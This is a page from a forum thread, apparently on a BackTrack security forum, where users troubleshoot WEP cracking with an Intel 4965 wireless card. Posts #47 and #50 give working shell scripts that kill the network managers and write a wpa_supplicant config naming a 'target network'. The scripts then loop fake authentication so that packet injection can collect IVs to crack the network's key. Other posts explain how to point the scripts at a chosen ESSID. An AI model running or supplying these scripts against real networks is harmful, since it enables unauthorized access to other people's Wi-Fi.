Page 5 of 15 FirstFirst ... 34567 ... LastLast
Results 41 to 50 of 145

Thread: 4965 agn

  1. #41
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Quote Originally Posted by the_shadow View Post
    first wep cracked but without AP association
    lets wait to BT4 final to see if this problem is solved!!!
    Or you can do some research on your own and find one of the many solves already out there. Help yourself, don't wait for someone to do it for you....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  2. #42
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    20

    Default

    i just try some scripts but....doesn't work!!!!!

  3. #43
    Junior Member Zermelo's Avatar
    Join Date
    Feb 2010
    Posts
    54

    Default

    Quote Originally Posted by White View Post
    Strange. Until now I was trying manualy and it didn't work. With the script things are different, hell knows why. But it still doesn't work. I get:

    Trying to associate with 00:xx:yy:zz:tt:aa (SSID='XXX' freq=2438 MHz)
    CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
    With my script, you do not enter the BSSID, you enter the ESSID, that is the NAME of the AP, NOT the series of 6 hex numbers.

    Probably why some of you are having problems.

  4. #44
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    21

    Default

    Your script works fine i managed to inject once and then on the same again later didn't work.

    On my other router it freezes after a few hundred,
    A question however:

    What would happen if you have 2 with the same ESSID?

  5. #45
    Junior Member Zermelo's Avatar
    Join Date
    Feb 2010
    Posts
    54

    Default

    Quote Originally Posted by Abbygail View Post
    What would happen if you have 2 with the same ESSID?
    If they are on different channels then simply lock onto the channel with the essid you wish to crack. If they have the same essid and the same channel, then you would have to modify the script to also check for this then ask for the bssid as well, but this is an unlikely circumstance.

    It's a simple script meant to take the work out of continuously modifying the wpa_supplicant config file every time you want to fakeauth, so I'm sure there is a lot that could be improved.

  6. #46
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    11

    Default

    Quote Originally Posted by Zermelo View Post
    If they are on different channels then simply lock onto the channel with the essid you wish to crack. If they have the same essid and the same channel, then you would have to modify the script to also check for this then ask for the bssid as well, but this is an unlikely circumstance.

    It's a simple script meant to take the work out of continuously modifying the wpa_supplicant config file every time you want to fakeauth, so I'm sure there is a lot that could be improved.
    Sorry, but no, I do not put in the BSSID when the script asks, only the ESSID.
    Maybe it's something wrong with the AP but I do not have anything else to test on.

    My goal is to get to see how CUDA works.

  7. #47
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    Default

    After several days of trying to get this to work on my 4965; I finally got fake auth and injection working at the same time.

    Finally tried a fresh copy of BT4 booting to a non-persist USB drive, BT4 out of the box.

    I used the shell script Zermelo posted but I modified wep_key0 from 1801b56668 to "fakeauth". Without the quotes it would not work for me. It would successfully connect, but IV never increased while injecting. Both ARP Request and Fragmentation have been successful.

    The only problem I've encountered is that it appears wpa_supplicant seems to loose the fake auth connection without notification. There are periods where my IV won't increase for a period of 60 sec. or more. It eventually corrects itself, or I manually kill the shell script and restart it and they start increasing again.

    Code:
    #!/bin/sh
    rm fake.conf
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo -e ""
    echo "Enter the SSID of the Target Network:"
    read SEL
    echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf
    echo -E "Starting Fake Authentication with "$SEL
    wpa_supplicant -c fake.conf -i wlan0 -Dwext

  8. #48
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    20

    Default

    Quote Originally Posted by ochlocracy View Post
    After several days of trying to get this to work on my 4965; I finally got fake auth and injection working at the same time.

    Finally tried a fresh copy of BT4 booting to a non-persist USB drive, BT4 out of the box.

    I used the shell script Zermelo posted but I modified wep_key0 from 1801b56668 to "fakeauth". Without the quotes it would not work for me. It would successfully connect, but IV never increased while injecting. Both ARP Request and Fragmentation have been successful.

    The only problem I've encountered is that it appears wpa_supplicant seems to loose the fake auth connection without notification. There are periods where my IV won't increase for a period of 60 sec. or more. It eventually corrects itself, or I manually kill the shell script and restart it and they start increasing again.

    Code:
    #!/bin/sh
    rm fake.conf
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo -e ""
    echo "Enter the SSID of the Target Network:"
    read SEL
    echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf
    echo -E "Starting Fake Authentication with "$SEL
    wpa_supplicant -c fake.conf -i wlan0 -Dwext
    one question: echo "Enter the SSID of the Target Network:" i have to put the essid name? without ""???

  9. #49
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    Default

    Yes when running the script, once it asks for the SSID enter it exactly as it appears in airodump-ng, no quotes.

    If you're using the modified script I posted, copy it into a file called fakeit . Give it execute permissions and run.

    # ./fakeit

    will ask for the SSID

    enter it exactly and you should be good.

  10. #50
    Just burned his ISO
    Join Date
    Dec 2008
    Posts
    21

    Default

    I'm still having problems with wpa_supplement losing the fake auth, forcing me to have to restart it.

    So I added onto the shell script that was posted to continue to loop the fake auth connection.

    If anyone else is having this problem, this will work around it. Run it, it will ask for the ESSID, the number of times to repeat, and the sec in between. Default times should be good enough for standard WEP crack.

    Code:
    #!/bin/sh
    killall NetworkManager
    killall knetworkmanager
    killall wpa_supplicant
    clear
    echo ""
    echo "Enter the ESSID of the Target Network: (use last)"
    read SEL
    if [ $SEL ]
    then
    	echo ""
    	if [ -e fake.conf ]; then
    		echo "Deleting old fake.conf"
    		rm fake.conf
    	fi
    	echo 'network={ \n ssid="'$SEL'" \n key_mgmt=NONE \n wep_key0="fakeauth" \n }' > fake.conf
    	echo "Starting Fake Authentication with $SEL"
    	
    else
    	if ! [ -e fake.conf ]; then
    		echo "ERROR - No config found, Provide ESSID"
    		exit 1
    	fi
    	echo ""
    	echo "Starting Fake Authentication with Previous ESSID"
    fi
    
    
    echo ""
    echo "How many times do you want to fake it? (30):"
    read TIMES
    if [ "$TIMES" = "" ]; then TIMES=30; fi
    
    
    echo ""
    echo "How many seconds between restarts? (45):"
    read SEC
    if [ "$SEC" = "" ]; then SEC=45; fi
    
    i=1
    while [ $i -le $TIMES ]
    do
    wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
    echo ""
    echo "Fake Auth Connection ($i of $TIMES) Success ...maybe check airodump-ng to be sure."
    i=`expr $i + 1`
    if [ $i -le $TIMES ]; then
    	echo "Reconnecting in $SEC seconds"
    	sleep $SEC
    	echo "Faking orgasam again... uh! ah! That's the spot!"
    fi
    done

Page 5 of 15 FirstFirst ... 34567 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •